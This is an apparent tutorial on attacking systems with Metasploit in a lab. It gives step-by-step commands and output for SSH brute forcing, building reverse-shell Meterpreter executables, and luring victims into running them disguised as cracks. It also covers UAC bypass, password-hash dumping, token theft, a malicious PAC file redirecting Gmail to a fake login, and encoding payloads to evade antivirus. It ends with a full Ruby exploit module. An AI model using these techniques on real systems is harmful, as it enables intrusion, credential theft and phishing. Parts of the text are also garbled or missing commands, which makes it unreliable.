Advanced Pentesting Techniques With Metasploit

1. AUXILIARY ... 4

1.a Scanners ... 4

1.b Fuzzers ... 7

1.c Credential harvesting ... 11

2. POST EXPLOITATION ... 14

2.a privilege escalation ... 14

2.b IE proxy PAC ... 26

3. MISCELLANEOUS ... 34

3.a NOP generator ... 34

3.b encoders ... 37

4. Advanced module/payload configuration options ... 40

5. Writing custom Metasploit modules. ... 43

Introduction

Metasploit is an open source application for security that was created by HD in 2003. Many exploits are contained in Metasploit, because Metasploit has a framework, which allows any user access to any modules desired. Metasploit has the architecture shown below:

FIGURE 1: METASPLOIT ARCHITECTURE

At this time, I will explain how to use Metasploit to take over a computer by scanning SSH and then performing

BRUTEFORCE to find the username and password. I will also show how to perform FUZZING. Here I will also explain how one can use ENCODER techniques to create a Trojan that is undetected by antivirus. I will also explain how a person can use fake login techniques for credential harvesting. In addition, I will show how, when you have entered the target com-puter, you can manipulate several processes with stealthy techniques when using Metasploit, taking the user token on the target computer, changing the username and password, etc., and injecting it with techniques of privilege escalation. Final-ly, I will I explain how to create a custom module on Metasploit and use NOP sled to make your exploits stable, and how someone using PROXYPAC can steal your bank account.

1. AUXILIARY

AUXILIARY is a collection of modules that do not use a payload. Functions of the auxiliary modules include port scanning, fingerprinting, service scanners, etc. Auxiliary modules also include several different types of protocols, such as scanners, network protocol fuzzers, wireless, and denial of service.

1.a Scanners

This module, contained in auxiliary, scans to find the information on targets ranging from open ports to even identifying the OS in use by the target. See the illustrations below:

FIGURE 2: SSH BRUTEFORCE

The illustration shows how an attacker gains access at a company that provides Wi-Fi to visitors.

This module has several features to scan applications such as DCERPC, Discovery, FTP, HTTP, IMAP, MSSQL, MySQL, Net-BIOS, POP3, SMB, SMTP, SNMP, SSH, Telnet, TFTP, VMWare, and VNC. For this article, I’m scanning SSH, using the auxiliary SSH module to scan and using brute force for the username and password. To get started, type msfconsole on the termi-nal.

root@sungai:~# msfconsole

After Metasploit loads, I use the module ssh_login with the following command: msf > use auxiliary/scanner/ssh/ssh_login

Then I set the target to be scanned with the command:

msf auxiliary(ssh_login) > set RHOSTS 192.168.109.132 RHOSTS => 192.168.109.132

FIGURE 4: SETTING IP TARGET

After I use the ssh_login module, I must have a dictionary to brute-force the SSH login. To perform user configuration and pass list using the existing dictionary, I use the following command:

msf auxiliary(ssh_login) > show options

FIGURE 5: SEE THE COMMAND FOR SETTING DICTIONARY

I then use USERPASS_FILE options for setting the dictionary list:

msf auxiliary(ssh_login) > set USERPASS_FILE /usr/share/Metasploit-framework/data/wordlists/root_userpass.txt

FIGURE 6: SETTING USERPASS_FILE

After setting wordlists to be used for brute force, I run that module with this command: msf auxiliary(ssh_login) > run

Note: The more userpass wordlists are used, the longer the process.

Results of the scanning SSH will look more or less like the following image.

FIGURE 7: STARTING BRUTE FORCE SSH You can see that the results are as shown below:

[*] 192.168.109.1:22 SSH - Starting brute force

[*] Command shell session 2 opened (192.168.109.130:53371 -> 192.168.109.1:22) at 2015-08-30 03:24:14 -0400

[+] 192.168.109.1:22 SSH - [01/52] - Success: 'cupenkz':'it-trad.com' 'uid=1001(cupenkz) gid=1003(cupenkz) groups=1003(cupenkz)

con-text=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux lo-calhost.localdomain 3.19.2-201.fc21.x86_64 #1 SMP Tue Mar 24 03:08:23 UTC 2015 x86_64 x86_64 GNU/Linux '

IP Target 192.168.109.1, Port 22, has a user access name “cupenkz” with password ”it-trad.com.” After getting the target, the following command can be used to do the checking:

msf auxiliary(ssh_login) > sessions -i

Note:

-i is the command for interacting with ID number Active sessions

===============

Id Type Information Connection -- ---- --- ---

2 shell linux SSH cupenkz:it-trad.com (192.168.109.1:22) 192.168.109.130:53371 -> 192.168.109.1:22 (192.168.109.1) 3 shell linux SSH cupenkz:it-trad.com (192.168.109.1:22) 192.168.109.130:36248 -> 192.168.109.1:22 (192.168.109.1)

FIGURE 8: RESULT OF SSH BRUTEFORCE After the session begins, you can directly interact with the target using the command:

msf auxiliary(ssh_login) > sessions -i 2 Note:

-i is the command for interact with ID number The purpose of the command is to run session number 2.

FIGURE 9: RUNNING SESSION 2

After you get shell on the target, you only have access as a user, but you could gain root access if you know the vulnerabil-ity in the OS.

1.b Fuzzers

Fuzzing is a technique in which an attacker exploits the weaknesses of an application that is used by the target. Usually these weaknesses could cause the target to crash, which can even provide access into the target terminal. In Metasploit,

there are several modules that can be used for such an application, including DNS, FTP, SSH, HTTP, SMB, SMTP, and TDS. However, not all versions of these applications be attacked using a fuzzer module contained in Metasploit.

This technique is illustrated below:

FIGURE 10: ILLUSTRATION OF FUZZING SSH

The illustration shows that, if a company has Wi-Fi access, it can be accessed by others and abused. Attackers can scan the company’s computers. In addition, if the company has a vulnerability in its SSH application, SSH on its computers can be targeted to cause a crash.

To start fuzzing, you must run Metasploit first with the command: root@sungai:~# msfconsole

FIGURE 11: RUNNING METASPLOIT After Metasploit runs, use the command below to run the SSH fuzzer.

msf > use auxiliary/fuzzers/ssh/ssh_version_corrupt msf auxiliary(ssh_version_corrupt) >

However, before using the ssh fuzzer module, maybe we should scan the target first, using the nmap simply to ascertain whether the target is using SSH or not. I use the command:

root@sungai:~# nmap -sS -v -A 192.168.109.1

Note:

-v is the command for verbose (resulting in detailed scanning)

-A is the command for detecting the OS used, version, script scanning, and traceroute

Results of the scan are shown below:

FIGURE 12: HASIL SCANNING NMAP

You can see from the picture that the IP 192.168.109.1 is using OpenSSH, version 6.6.1, with port 22 open. After viewing the information that is used by the SSH module fuzzer, you can use the command:

msf auxiliary(ssh_version_corrupt) > info The following information can be seen:

MAXDEPTH specifications for testing on the target byte RHOST is an IP target

RPORT is a port target.

FIGURE 13: SETTING MAXDEPTH AND RHOST SSH FUZZER

The picture above shows the settings for the specification of bytes sent, the target IP, and the target port. To perform settings, use the command:

msf auxiliary(ssh_version_corrupt) > set maxdepth 999999999999 maxdepth => 999999999999

msf auxiliary(ssh_version_corrupt) > set rhost 192.168.109.1 rhost => 192.168.109.1

After the settings are correct, you can run with this command: msf auxiliary(ssh_version_corrupt) > run

The picture above shows Metasploit using fuzzing against the target, but not all versions of SSH have this vulnerability. So, if SSH in the target does not crash, there is the possibility that SSH is already in the patch.

1.c Credential harvesting

Credential harvesting is a social engineering technique that is used to get a user and password for user login, SSH, and others. This technique has many variations through which an attacker can create a payload to get a username/password login and other information. An illustration of credential harvesting is shown below.

FIGURE 15: CREDENTIAL HARVESTING

The image above shows that the attacker can retrieve user and password targets using AutoLogin if the target has Auto-Login settings.

First, we must have access to a computer target for use in the credential harvesting technique. I gain access using Meterpreter, as shown below:

FIGURE 16: METERPRETER CONNECTED

After connecting with Meterpreter, I run Meterpreter as a background service. Then I search the credential module using the following command:

msf exploit(handler)> search credential

FIGURE 17: SEARCHING CREDENTIAL MODULE In Metasploit, there are many module credentials, but I use the module

post/windows/gather/credentials/windows_autologin. To access this module, I use the following command:

FIGURE 18: USING MODULE POST/WINDOWS/GATHER/CREDENTIALS/WINDOWS_AUTOLOGIN

After that, I can see more options in this module with the command: msf post(windows_autologin)> show options

FIGURE 19: SHOWING OPTION MODULE WINDOWS_AUTOLOGIN

The above picture shows an option contained in the module. Here I am just setting part of the session, which is used with the command:

msf post(windows_autologin)>sessions -i

FIGURE 20: SEEING SESSION ACTIVE IN TARGET

msf post(windows_autologin)> set sessions 1

FIGURE 21: SETTING SESSION ON MODULE WINDOWS AUTO LOGIN After setting the module, I run this module with the command:

msf post(windows_autologin)> exploit

FIGURE 22: EXPLOIT RUNNING

The illustration shows how the exploit reveals the password and username information contained on the target computer: user: cupenkz

password [No Password!] Domain: FATBOYGAG-SLIM

When the target computer does not have a set auto login, the exploit does not work and shows something like the image below:

2. POST EXPLOITATION

Another technique that the attacker can use to gain further access to the target's internal network is packet sniffing. An attacker can also put a backdoor to retain access to the target.

2.a privilege escalation

This technique allows an attacker to take over the target computer by taking advantage of an exposed vulnerability. Once the computer is taken over, the attacker tries to raise user access, as in the following illustration:

FIGURE 24: PRIVILEGE ESCALATION

In this example, my target is Windows 7 Ultimate 32 bit. To do the scanning to find the OS used, I use the command: root@sunga : nmap –sS –v –A 192.168.130.1

FIGURE 25: SCANNING USE NMAP Note:

-sS is the command for scanning by using the TCP SYN packet -v is the command for verbose (resulting in detail scanning)

-A is the command for detecting the OS used, version, script scanning, and traceroute

FIGURE 26: THE RESULT FROM SCANNING USE NMAP

To perform privilege escalation, I first made the application form execute the payload; then the target will be connected with a computer attacker. I use msfpayload with the command:

sungati@root : msfpayload windows/Meterpreter/reverse_tcp LHOST=192.168.130.128 LPORT=4444 x > /var/www/cupenkz.exe

FIGURE 27: LOADING MSFPAYLOAD TO MAKE A MALICIOUS FILE

Note:

- Msfpayload command creates a payload using reverse_tcp - LHOST is an IP attacker

- LPORT is a computer port attacker

- X command creates an exe file named cupenkz.exe

After making the application payload, you need to trick the unsuspecting targets in order to use the payload silently, such as by combining it with a program like crack or install autoscript usb, which is useful when installed in the target computer; then the application will run. In this case, I just give an example of how best to move so that the application is executed with the target.

After that, I run the exploit handler on a computer attacker, with the command:

The function of the above command is that, when cupenkz.exe is executed with a target computer, the attacker computer is ready to receive the payload and open a reverse connection from the target computer.

FIGURE 29: RUNNING EXPLOIT HANDLER AND THE TARGET 192.168.130.1 CONNECTED FOR RUNNING THE PROGRAM CUPENKZ.EXE After setting the LHOST attacker on the computer, I run the command:

msf exploit(handler) > run

Then, when one of the files that we uploaded earlier (cupenkz.exe) is executed by the target, it will look like the image above.

The above-owned user access is usually limited to the user, not the administrator or root.

FIGURE 30: ACCESS IS DENIED I tried to do getsystem when it was targeted with the command:

Meterpreter > getsystem

FIGURE 31: GETSYSTEM FAIL

The above condition is that we have only limited access to user, and cannot access to the system; I view it with the com-mand:

FIGURE 32: THE POSITION OF THE CURRENT USER After that, I review the information contained in getsystem with the command:

Meterpreter > getsystem -h

Usage: getsystem [options]

Attempt to elevate your privilege to that of local system. OPTIONS:

-h Help Banner.

-t <opt> The technique to use. (Default to ”0”). 0. All techniques available

1. Service - Named Pipe Impersonation (In Memory/Admin) 2. Service - Named Pipe Impersonation (Dropper/Admin) 3. Service - Token Duplication (In Memory/Admin)

There are three functions that are used to increase user access to a target computer, among others.

The first function is 1. Service - Named Pipe Impersonation (In Memory/Admin), where the attacker does the exploit on the target computer, usually as a local exploit. Local exploits are used to take over the target computer in full. I first run Meterpreter as background, with the command:

FIGURE 33: RUNNING METERPRETER AS BACKGROUND msf exploit(handler) > search uac

FIGURE 34: SEARCHING MODULE LOCAL EXPLOIT BYPASSUAC msf exploit(handler) > use/exploit/windows/local/bypassuac

Above I’m searching a Windows 7 computer with the local exploit with the name bypass UAC, and then I set the session on a local exploit.

FIGURE 35: SETTING SESSION msf exploit(bypassuac) > set SESSION 2

After the setting session is complete, I run the exploit locally with the command: msf exploit(bypassuac) > exploit

FIGURE 36: RUNNING BYPASSUAC EXPLOIT LOCAL WINDOWS 7

Session 2 has been created by using local exploit bypassuac to replace the session with the command: msf exploit(bypassuac) > sessions -i

msf exploit(bypassuac) > sessions –i 2

FIGURE 37: CHANGING SESSION msf exploit(bypassuac) > sessions -i 2

After running this, I will try to identify whether user access is no longer restricted.

FIGURE 38: ACCESS BY USING GETSYSTEM

The picture above shows where the system is created using a local exploit. Here I took over the account system; in other words, the root account. If you have the root account, then you can take over the entire contents of the target computer.

UAC (user account control) is a security feature in Windows. Each function that appears to be accessing files or applica-tions on a Windows system will display a warning from UAC asking for confirmation as a security feature. This feature can be deactivated (disabled) so you are not disturbed by the frequent Windows question, "Do you want to allow the follow-ing program to install software on this computer?"

UAC/user account control is a technology and security infrastructure introduced with Microsoft’s Win-dows Vista and WinWin-dows Server 2008 operating systems, with a more relaxed[1] version also present in Windows 7 and Windows Server 2008 R2. It aims to improve the security of Microsoft Windows by limit-ing application software to standard user privileges until an administrator authorizes an increase or ele-vation. In this way, only applications trusted by the user may receive administrative privileges, and mal-ware should be kept from compromising the operating system. In other words, a user account may have administrator privileges assigned to it, but applications that the user runs do not inherit those privileges unless they are approved beforehand or the user explicitly authorizes it.

Why do we need an exploit to bypass UAC? The exploit is a technique by which we can take over the targeted computer. There are two types of exploit attacks, namely remote and local. Usually a remote exploit is used when an application on the target has a vulnerability that can be accessed remotely (via the port connection). In this example, we use SSH, FTP, etc. A local exploit usually finds the cracks in the application contained on the targeted computer. See the illustration be-low.

FIGURE 39: REMOTE EXPLOIT

The figure shows a remote exploit, with the attacker scanning SSH on the target and finding a SSH vulnerability. Then the attacker can attack using a remote SSH exploit.

FIGURE 40: LOCAL EXPLOIT

The illustration shows the attacker performing remote ssh in the open and seeing that the target computer’s UAC feature can be bypassed, so the user privileges can be raised, and the attacker uses the local exploit bypassuac on the target com-puter. This shows the difference between a local exploit and a remote exploit.

Bypass UAC is a technique that raises the standard user access rights to be an administrator without requiring authoriza-tion from the target. In this example, I used the payload bypassUAC on Metasploit. This technique will create an executa-ble file and find the Windows directory to which to upload it. Then the file is injected and, if the file is executed, it will change the permissions of the user to be an administrator. An illustration can be seen in the figure below:

FIGURE 41: BYPASSUAC The illustration shows approximately how UAC is bypassed:

1. Meterpreter connect—attacker must have a connection to the target through Meterpreter.

2. Upload malicious—attacker creates a malicious file using bypassuac, then uploads it to the target computer and puts it in a specific directory on system target.

3. Execute file—attacker executes files that have been created earlier.

4. Create session for Meterpreter—malicious file creates a session that is integrated through Meterpreter. The second function is 2. Service - Named Pipe Impersonation (Dropper / Admin)

While the above function is aimed at a file system on the target computer, here I use Windows API with railgun, which is one of the applications contained in Metasploit. Railgun is an application that can interact and gain full access using Win-dows API.

For information contained in the Windows API documentation on the website, you can look at msdn.microsoft.com, be-cause I am not going to explain much here about the API function in Windows.

Here I use an IRB shell to run railgun, with the command: Meterpreter > irb

[*] Starting IRB shell

[*] The 'client' variable holds the Meterpreter client

After that, I see what DLLs are used in this module that already exist in railgun, with the command: >> client.railgun.known_dll_names

=> ["kernel32", "ntdll", "user32", "ws2_32", "iphlpapi", "advapi32", "shell32", "netapi32", "crypt32", "wlanapi", "wldap32", "version"]

>>

FIGURE 42: DLLS USED IN RAILGUN

The above are the default 12 DLLs that can be used in railgun; here I use netapi32 to change user admin on the target computer.

First, I must check what user is already present on the target with the command: Meterpreter > hashdump

tor:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: cu-penkz:1004:aad3b435b51404eeaad3b435b51404ee:ebb51400c232862211db317da0793bc9::: fat-boygagslim:1000:aad3b435b51404eeaad3b435b51404ee:7398d3b8ece0f71589fbfa3d3c54480f::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Updatu-sUser:1001:aad3b435b51404eeaad3b435b51404ee:0d7025661596df7289a35b32f20b4bb8:::

FIGURE 43: CUPENKZ USER PASSWORD BEFORE CHANGING EBB51400C232862211DB317DA0793BC9

The above shows six users who are on the target computer; now I'll try change the password cupenkz using the following command:

>> client.railgun.netapi32.NetUserChangePassword(nil, "cupenkz", "cupenkz", "cupenkz123")

Note:

- client.railgun.netapi32.NetUserChangePassword <= command to use neta-pi32.dll and use the function NetUserChangePassword

- nil <= domainname - cupenkz <== username - cupenkz <== oldpassword - cupenkz123 <== newpassword

FIGURE 44: COMMAND NETUSERCHANGEPASSWORD, NETAPI32 SUCCESSFULLY

To check if the cupenkz password has been replaced or not, I checked with the command: Meterpreter > hashdump

ad-min:1003:aad3b435b51404eeaad3b435b51404ee:3008c87294511142799dca1191e69a0f::: Administra-tor:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: cu-penkz:1004:aad3b435b51404eeaad3b435b51404ee:cd84df77d079b66945e777398b4d4937::: fat-boygagslim:1000:aad3b435b51404eeaad3b435b51404ee:7398d3b8ece0f71589fbfa3d3c54480f::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Updatu-sUser:1001:aad3b435b51404eeaad3b435b51404ee:0d7025661596df7289a35b32f20b4bb8:::

FIGURE 45: CUPENKZ PASSWORD HAS BEEN REPLACED TO BECOME CD84DF77D079B66945E777398B4D4937

You can see the cupenkz password before is cd84df77d079b66945e777398b4d4937; the password that was changed ear-lier is ebb51400c232862211db317da0793bc9.

For more details, I look at the functions that are on netapi32.dll in this directory: root@sungai:cd /usr/share/Metasploit-

frame-work/lib/rex/post/Meterpreter/extensions/stdapi/railgun/def root@sungai:/usr/share/Metasploit-

frame-work/lib/rex/post/Meterpreter/extensions/stdapi/railgun/def# less def_netapi32.rb

see function NetUserChangePassword

dll.add_function('NetUserChangePassword', 'DWORD', [ ["PWCHAR","domainname","in"], ["PWCHAR","username","in"], ["PWCHAR","oldpassword","in"], ["PWCHAR","newpassword","in"] ])

Above is a function that allows the user to change the password using railgun with netapi32.dll. After you change the user, you can only login using RDP. This technique could possibly be used when you are a user/guest, but you want to get more access to the admin/root; then you can just replace the users, or create new functions to be added as admin.

For the third function 3: Service - Token Duplication (In Memory/Admin), which involves stealing the token in the system, I am using an application on Metasploit incognito to steal the token on the target system. Use the command:

Meterpreter > use incognito

Loading extension incognito...success. Meterpreter >

FIGURE 46: USING INCOGNITO Then I check the username used in this Meterpreter, with the command:

Meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

Now I see in list_token anything contained on the system with the command: Meterpreter > list_tokens -u

Delegation Tokens Available

======================================== fatboygag-slim\fatboygagslim

NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM

Impersonation Tokens Available

======================================== fatboygag-slim\UpdatusUser

FIGURE 47: LISTING TOKENS USED IN TARGET

Note:

-u command for see list token

There are two tokens, DELEGATION and IMPERSONATION. DELEGATION is a token that can interact using the remote, but it is not permanent, unlike the IMPERSONATION token.

After that, I would choose the token using the command: Meterpreter > impersonate_token Usage: impersonate_token <token>

Instructs the Meterpreter thread to impersonate the specified token. All oth-er actions will then be made in the context of that token.

Hint: Double backslash DOMAIN\\name (Meterpreter quirk) Hint: Enclose with quotation marks if name contains a space Meterpreter >

FIGURE 48: IMPERSONATE_TOKEN

Here I will try to use the user token "fatboygag-slim fatboygagslim \\", with the command

Meterpreter > impersonate_token fatboygag-slim\\fatboygagslim [+] Delegation token available

[+] Successfully impersonated user fatboygag-slim\fatboygagslim

FIGURE 49: IMPERSONATE_TOKEN SUCCESSFULLY

To check whether the token has been successfully used, I use the command:

Meterpreter > getuid

Server username: fatboygag-slim\fatboygagslim

FIGURE 50: IMAGE GETUID TOKEN SUCCESSFULLY

From the above explanation, we see that, when we are connected to the target, then we can use the existing user token on the computer by using incognito.

2.b IE proxy PAC

This is a technique in which the attacker can insert a fake login on a website by performing exploitation on IE so that, when the target is open on the web, the password will be captured by the attacker, as shown below.

FIGURE 51: IE PROXY PAC

To run this technique, you should already have access to the target computer. Here, I use Meterpreter on the target using the exploit me08_067_netapi, as shown in the following illustration:

FIGURE 52: METERPRETER USING EXPLOIT ME08_067_NETAPI

After I have opened the target with Meterpreter, I look for the ie_proxypac exploit with this command: msf exploit(ms08_06_netapi) > search ie_proxy

FIGURE 53: SEARCHING IE_PROXY MODULE After searching, there is one module for ie_proxy, and then I use the command:

FIGURE 54: INFO MODULE IE_PROXYPAC

The picture above shows a brief description of the module ie_proxypac. To run the module, I see the first option is to look at at the previous settings. I use the command:

msf post(ie_proxy) > show options

FIGURE 55: OPTION MODULE IE_PROXYPAC

In the module above, there are five options that must be set, but for AUTO DETECT and DISABLE PROXY I’m using the de-fault. For the REMOTE_PAC, the setting will load a .pac file on remote, and LOCAL_PAC is a setting where there is a .pac file on the computer attacker, which is a previously made .pac file on the local computer. I put the path

FIGURE 56: CONTENT FILE CUPENKZ.PAC

The picture above shows a .pac file that will open www.gmail.com and the target computer will be redirected to the IP 192.168.109.130. The IP is already in post fake login.

After that, I did the setting for LOCAL_PAC with the command:

msf post(ie_proxy) > set LOCAL_PAC /var/www/cupenkz.pac

FIGURE 57: SETTING LOCAL_PAC

After setting the file .pac , I set a SESSION number on which to run the file. However, before that I check that SESSION is at the target using the command.

msf post(ie_proxy) > sessions -i Note:

FIGURE 58: CHECKING ACTIVE SESSION A session can be active only once; after that, do the settings with the command:

msf post(ie_proxy) > set SESSIONS 1

Note:

-i is the command for interacting with the ID number

FIGURE 59: SETTING SESSION USE NO 1 After all the settings are done, then run the command:

msf post(ie_proxy) > exploit

FIGURE 60: RUNNING IE_PROXYPAC

The picture above shows the information that the .pac file from the local computer will upload to the target computer with the following command:

To ascertain whether the .pac file has been set on the target computer, I check the target. I open IE, chose menu Internet Options, and select the option as shown below.

FIGURE 61: INTERNET OPTION IE After that, I choose Connection and LAN setting

FIGURE 62: SETTING IE INTERNET OPTION

The picture above shows setting the proxypac on IE, where the file hFTVnk.pac is configured as the IE proxy pac. To verify whether the file proxy is mounted, run IE and open www.gmail.com, as shown below:

To better ascertain whether hF Vnk.pac is loaded or not, I use View Source and look for the link authentication used, as shown below:

FIGURE 64: VIEWING SOURCE PROXYPAC

As can be seen, www.gmail.com is the link that is opened in IE, because the attached file authentication cupenkz.html, if there is a login it, will immediately redirect to www.mail.google.com.

The advantage of using this technique is the URL address to the web browser is almost similar to the original, so it is less likely to be suspected.

3. MISCELLANEOUS

A function of this technique is bypassing security contained in the target. As a small example, it can bypass antivirus and IDS (instruction detecting system).

3.a NOP generator

NOP (no operation) is a technique by which NOP commands are used to add some bytes to the exploit payload. The func-tion of adding bytes is to solve the problem of finding the original EIP address of a buffer, effectively increasing the target area.

As an example from everyday life is a glass that can be filled with 500ml of water. If we fill it with 501ml water, the water will be spilled out of the glass. Similarly, with the buffer-overflow technique, an application that can store 500 bytes of data is filled with 501 bytes, causing it to crash. Think of it this way: After the fuzzing finds that the EIP application lies in 510 bytes and the shellcode contains 100 bytes, it is possible to add 410 bytes of NOPs.

For an illustration of how NOP works, see the diagram below:

FIGURE 65: NOP WORKING

The above illustration shows how NOP works: NOP makes a jump to the next address so that the end of the NOP com-mand calls the shellcode.

For using the NOP Generator, you must already know the NOP module contained in Metasploit. root@sungai:~# msfconsole

FIGURE 66: START METASPLOIT

Here I will make a NOP sled using payload/windows/shell_bind_tcp, with the command: msf > use payload/windows/shell_bind_tcp

FIGURE 67: USE SHELL_BIND_TCP PAYLOAD

As can be seen from the picture above, shell_bind_tcp can make a connection back from the target when the target exe-cutes the payload, and then the target will be connected to the computer attacker using attacker port 4444. To execute the payload, use the command below:

FIGURE 68: GENERATE PAYLOAD

It can be seen from the results that the payload generated little endian or so-called shellcode that totals 341 bytes. Here is a NOP function can add value to the shellcode. To try it out, can use the command.

msf payload (shell_bind_tcp) > generate -s 14

Note:

FIGURE 69: GENERATE USE -S NOP SLED

The shellcode, as can be seen from the above, now contains 355 bytes. The “-s command 14” adds a NOP sled of 14 bytes to the shellcode. The function of the NOP sled is the same thing that I illustrated by the water in a glass. If the shellcode does not crash the application being fuzzed, the NOP sled is one way in which values can be added to exploit the shellcode running.

3.b encoders

This is a technique that is used to bypass anti-virus or IDS/IPS. It is usually used by someone to create a Trojan and is not detected by anti-virus software.

At this time, I will make a payload.exe using msfvenom with the command:

root@sungai : ~# msfvenom -p windows/Meterpreter/reverse_tcp

LHOST=192.168.109.130 LPORT=6969 -x -f exe >

/root/Desktop/cupu.exe

Note:

-p is the command to choose the payload used

-x is the command to specify a custom executable file to use as a template -f is the command for an output format file to be produced

FIGURE 70: CREATE FILE CUPU.EXE

You can see in the picture above that msfvenom makes a file with the name “cupu.exe” by using the payload win-dows/Meterpreter/reverse_tcp and, if this file is executed in the target, the target will be connected to the attacker's IP 192.168.109.130 using Port 6969.

Here I will check the cupu.exe file by using www.virustotal.com:

FIGURE 71: RESULT SCANNING CUPU.EXE

The illustration above shows that the cupu.exe file is detected by three antivirus programs out of 56. However, here I am trying to encode the cupu.exe file to cupenkz.exe to be undetected by AV software. Use the command:

root@sungai : ~# msfvenom -p windows/Meterpreter/reverse_tcp

LHOST=192.168.109.130 LPORT=6969 -x -f exe -e

x86_shikata_ga_nai> /root/Desktop/cupenkz.exe Note:

-p is the command for choosing what payload is used

-x is the command for specifying a custom executable file to use as a tem-plate

-f is the command for output format file, yang akan di hasilkan -e is the command for choosing the encryption you want to be used

To the above command, I add the encode options -e x86_shikata_ga_nai, and the results of the cupenkz.exe file on scan-ning www.virustotal.com, as shown below.

FIGURE 72: RESULT SCANNING FILE CUPENKZ.EXE AT VIRUSTOTAL.COM

The picture above shows that the cupenkz.exe file as completely undetectable by antivirus software, using shikata_ga_nai encoding.

4. Advanced module/payload configuration options

These are techniques whereby, when we're loading a module, we can set parameters in advance, by which I mean that it can automatically make an order in the attack. For example, use this command:

msf auxiliary (ssh_login) > show advanced

FIGURE 73: SETTING SHOW ADVANCED MODULE SSH_LOGIN

The above is an advanced setting for auxiliary ssh_login scanners; it can be seen that there are some settings and also a description. To change the settings, use the command:

msf auxiliary (ssh_login) > set Name CurrentSetting example:

msf auxiliary (ssh_login) > set autorunscript /post/linux/gather/enum_config

FIGURE 74: CHANGE SETTING AN AUTORUNSCRIPT

enum_conf command is to take some of the configuration information contained on target; to check whether the setting has been changed or not , use a command like this:

FIGURE 75: AUTORUNSCRIPT SETTING HAS BEEN CHANGED

You can see in the picture above that the setting for AutoRunScript has turned into post/linux/gather/enum_config. This affects the actual setting when you want to attack with their own methods, because usually this method depends on the situation and conditions in the field.

AutoRunScript can be seen from the results of the run, as shown below:

FIGURE 76: RESULT FROM AUTORUNSCRIPT

The picture above shows that the OS used by the target is Fedora 21 and there is some log information that has been stored on the computer attacker. By using AutoRunScript, you can make an attack and obtain the information contained in the target. Examples of the information obtained are shown below.

FIGURE 77: RESULT LOG FROM AUTORUNSCRIPT

The picture above shows the results log on Samba configuration, and shows where the log files are stored by the comput-er attackcomput-er.

5. Writing custom Metasploit modules.

Writing custom Metasploit modules allows you to create your own module and load it into Metasploit. However, to make the module, you should understand the programming language Ruby. Here I have an example exploit that I took from ex-ploit-db.com:

FIGURE 78: EXPLOIT FROM EXPLOIT-DB.COM

The source above is made by w3tw0rk, who made an exploit by utilizing the vulnerability of applications Pitbul IRC Bot. Here's the source:

_________________________________________________snip_______________________________________________ ##

# This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp def initialize(info = {})

super(update_info(info,

'Name' => 'w3tw0rk / Pitbul IRC Bot Remote Code Execution', 'Description' => %q{

This module allows remote command execution on the w3tw0rk / Pitbul IRC Bot. }, 'Author' => [ 'Jay Turla' ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '120384' ], [ 'EDB', '36652' ] ],

'Payload' => {

'Space' => 300, # According to RFC 2812, the max length message is 512, including the cr-lf 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd' } }, 'Targets' => [ [ 'w3tw0rk', { } ] ], 'Privileged' => false, 'DisclosureDate' => 'Jun 04 2015', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(6667),

OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']), OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),

OptString.new('CHANNEL', [true, 'IRC Channel', '#channel']) ], self.class) end def check connect res = register(sock) if res =~ /463/ || res =~ /464/

vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") return Exploit::CheckCode::Unknown

end

res = join(sock)

if !res =~ /353/ && !res =~ /366/

vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")

return Exploit::CheckCode::Unknown end

quit(sock) disconnect

if res =~ /auth/ && res =~ /logged in/ Exploit::CheckCode::Vulnerable

else

Exploit::CheckCode::Safe end

end

def send_msg(sock, data) sock.put(data) data = "" begin read_data = sock.get_once(-1, 1) while !read_data.nil? data << read_data read_data = sock.get_once(-1, 1) end

rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") end data end def register(sock) msg = ""

if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty? msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"

end

if datastore['NICK'].length > 9 nick = rand_text_alpha(9)

print_error("The nick is longer than 9 characters, using #{nick}") else

nick = datastore['NICK'] end

#{rhost} :#{nick}\r\n" send_msg(sock,msg) end

def join(sock)

join_msg = "JOIN #{datastore['CHANNEL']}\r\n" send_msg(sock, join_msg)

end

def w3tw0rk_command(sock) encoded = payload.encoded

command_msg = "PRIVMSG #{datastore['CHANNEL']} :!bot #{encoded}\r\n" send_msg(sock, command_msg)

end

def quit(sock)

quit_msg = "QUIT :bye bye\r\n" sock.put(quit_msg)

end

def exploit connect

print_status("#{rhost}:#{rport} - Registering with the IRC Server...") res = register(sock)

if res =~ /463/ || res =~ /464/

print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") return

end

print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} chan-nel...")

res = join(sock)

if !res =~ /353/ && !res =~ /366/

print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")

return end

print_status("#{rhost}:#{rport} - Exploiting the IRC bot...") w3tw0rk_command(sock)

quit(sock) disconnect end

end

_________________________________________________snip_______________________________________________ The script above is a structure for writing an exploit for Metasploit. You can add or rewrite the exploit if you want. The source can be downloaded here: https://www.exploit-db.com/exploits/38302/.

After downloading the source, copy it into the directory with the Metasploit command:

root@sungai : ~# wget https://www.exploit-db.com/exploits/38302/; mv 38302

cupenkz.rb; mv cupenkz.rb ~/.msf4/modules/exploits/

Note:

